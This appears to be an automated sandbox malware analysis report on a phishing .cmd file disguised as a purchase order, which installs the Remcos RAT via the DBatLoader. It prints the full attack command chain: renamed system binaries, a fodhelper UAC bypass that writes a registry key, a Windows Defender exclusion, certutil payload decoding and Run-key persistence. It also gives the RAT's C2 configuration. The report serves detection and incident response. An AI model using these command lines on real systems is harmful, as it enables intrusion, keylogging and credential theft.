
Windows Analysis Report
Purchase Order is approved26042024.cmd

Overview

General Information

Sample name:Purchase Order is approved26042024.cmd
Analysis ID:1432341
MD5:8d5ff3734fb8dddaf133ff8ef662aa1d
SHA1:08f0f2978d3c989b0b6ce03a804a6b0cfc0453b6
SHA256:0874f8f4032c3a90a16ad54d23d9ef6c47b1a5a3c1056cbe125e6ed1846cf94c
Tags:cmd
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 1216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 1048 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 1020 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 5432 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3752 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 6648 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 2792 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xkn.exe (PID: 5496 cmdline: C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • alpha.exe (PID: 7752 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • ger.exe (PID: 7776 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users " MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • fodhelper.exe (PID: 8016 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
    • alpha.exe (PID: 7972 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 6972 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 6348 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8064 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 4500 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5044 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • sppsvc.pif (PID: 5228 cmdline: C:\Users\Public\Libraries\sppsvc.pif MD5: F83153803040CB7382CF1CC8ABEBD4C7)
      • extrac32.exe (PID: 8036 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Kpeyvroh.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • alpha.exe (PID: 8012 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 6304 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7512 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 5496 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2792 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • alpha.exe (PID: 7816 cmdline: C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1956,i,11964562257046214624,14274192803590327640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • SystemSettingsAdminFlows.exe (PID: 7824 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • Kpeyvroh.PIF (PID: 7552 cmdline: "C:\Users\Public\Libraries\Kpeyvroh.PIF" MD5: F83153803040CB7382CF1CC8ABEBD4C7)
  • Kpeyvroh.PIF (PID: 1528 cmdline: "C:\Users\Public\Libraries\Kpeyvroh.PIF" MD5: F83153803040CB7382CF1CC8ABEBD4C7)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Remcos configuration (extracted): {"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (dropped files)
Source | Rule | Description | Author | Strings
  • C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
  • 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    • 0x6c4c0:$a1: Remcos restarted by watchdog!
    • 0x6ca38:$a3: %02i:%02i:%02i:%03i
  • 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Yara matches (unpacked PEs)
Source | Rule | Description | Author | Strings
  • 36.2.Kpeyvroh.PIF.29a0000.0.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
  • 36.2.Kpeyvroh.PIF.29a0000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
  • 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    • 0x6c4a8:$a1: Remcos restarted by watchdog!
    • 0x6ca20:$a3: %02i:%02i:%02i:%03i

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ProcessId: 1020, ProcessName: alpha.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Kpeyvroh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 1020, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe, ProcessId: 5432, ProcessName: extrac32.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 142.250.217.193, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\sppsvc.pif, Initiated: true, ProcessId: 5228, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49729
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Kpeyvroh.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kpeyvroh
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\sppsvc.pif, CommandLine: C:\Users\Public\Libraries\sppsvc.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\sppsvc.pif, NewProcessName: C:\Users\Public\Libraries\sppsvc.pif, OriginalFileName: C:\Users\Public\Libraries\sppsvc.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, ProcessName: sppsvc.pif
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 5496, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3ru4bzt.u0w.ps1
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe
Source: Process started | Author: frack113 | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Purchase Order is approved26042024.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1216, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe " , ProcessId: 2792, ProcessName: alpha.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\Public\Libraries\sppsvc.pif, ProcessId: 5228, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort IDS alerts
  • Timestamp: 04/26/24-21:56:24.593602 | SID: 2032776 | Source Port: 49730 | Destination Port: 9231 | Protocol: TCP | Classtype: A Network Trojan was detected
  • Timestamp: 04/26/24-21:58:37.300504 | SID: 2032777 | Source Port: 9231 | Destination Port: 49730 | Protocol: TCP | Classtype: A Network Trojan was detected


AV Detection

Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE42F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,25_2_00007FF67DE42F38
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE42C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,25_2_00007FF67DE42C2C
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE87F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,25_2_00007FF67DE87F14
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEC5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,25_2_00007FF67DEC5F04
Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF07EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,25_2_00007FF67DF07EE8
